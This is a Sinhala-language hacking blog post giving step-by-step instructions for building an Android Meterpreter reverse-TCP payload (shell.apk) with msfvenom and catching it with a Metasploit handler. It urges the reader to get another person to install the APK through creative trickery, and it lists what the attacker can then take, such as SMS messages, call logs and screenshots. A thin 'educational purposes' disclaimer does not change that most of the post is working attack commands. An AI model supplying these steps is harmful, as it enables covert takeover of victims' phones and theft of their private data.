Android Payload එකක් හදමු

ඔන්න ඉතින් අද නම් අරන් එන්නෙ හැමෝම කැමතිම පාඩමක්.

අද අපි බලමු කොහොමද එකම network එකකට connect වෙලා ඉන්න කෙනෙක්ගෙ android phone එකක් හැක් කරන්නෙ කියල.

මෙය අධ්‍යාපනික අරමුණු සදහා සැකසූවකි. ඔබ මෙම දැනුම භාවිතා කරන අයුරු පිළිබද අප Admin මඩුල්ල හෝ මෙහි කතුවරයා කිසිදු වගකීමක් නොදරන බව තරයේ සදහන් කලයුතුය.

මේකෙදි අපි කරන්න යන්නෙ පොඩි payload එකක් හදල කාට හරි යවන එක. එයා ඒක open කරාට පස්සෙ අපිට ඒ phone එකේ ගොඩක් දේවල් කරන්න පුලුවන්.

මුලින්ම msfvenom යොදාගෙන අපි මේ payload එක හදාගෙන ඉමු.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4445 R > /root/desktop/shell.apk

-p කියන එකෙන් තමයි අපි පාවිචිචි කරන payload එක දෙන්නෙ.

LHOST කියන තැනට ඔයාගෙ local ip එක දෙන්න.

LPORT කියන තැනට පාවිච්චි කරන්න ඕනෙ port එක දෙන්න.

/root/Desktop/ කියන තැනට මේක save කරන්න ඕනෙ path එකයි shell.apk එකට payload එක save කරන්න ඕනෙ නමයි දෙන්න.

ඒ ටික කරාට පස්සෙ අපි Metasploit-Framework එක open කරගන්න ඕනෙ.

service postgresql start
msfconsole

ඊට පස්සෙ මෙන්න මේ command ටික type කරන්න.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4445
run

ඒක close නොකර තියාගන්න.

මෙහෙම බලාගෙන command type කරන එක තමයි මේකෙ ලේසි කොටස. අමාරු කොටස තමයි අපි හදපු payload එක කාගෙ හරි phone එකක install කරවන එක. මේකට ඉතින් පොඩ්ඩක් නිර්මාණශීලී වෙන්න ඕනෙ.

කොහොම හරි ඉතින් මේක install කරවල open කරපු ගමන්ම ඔයාට අර msfconsole එක වෙනස් වෙලා කියල පෙනෙයි. ඒකෙ meterpreter> කියල වැටිල තියෙනවනම් වැඩේ හරි. help කියන එක ගහල කරන්න පුලුවන් දේවල් බලන්න. smsdump, call log, screenshot වගේ ගොඩක් දේවල් ඇති.

දැන් ඉතින් මේක දැනගත්ත පලියට hack කරන්න යන්න එපා. මොකද මේක සිහියෙන් කියෙව්වනම් තේරෙන්න ඇති මේක වැඩ කරන්නෙ එකම network එකක තියෙන device එකකට විතරයි කියන එක. අනික කොහොමත් මේක detect වෙනව Antivirus වලින්. එහෙම අහු වෙන්නෙ නැති වෙන විදිහට හදන හැටි වෙන දවසක කියල දෙන්නම්.

එහෙනම් හැමෝටම සුභ දවසක් !

::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::We Don't Hack Technology…:::
:::We Hack The Human Mind…::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::Lesson By :- :::NightShade::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Comments

Post a Comment

Popular Posts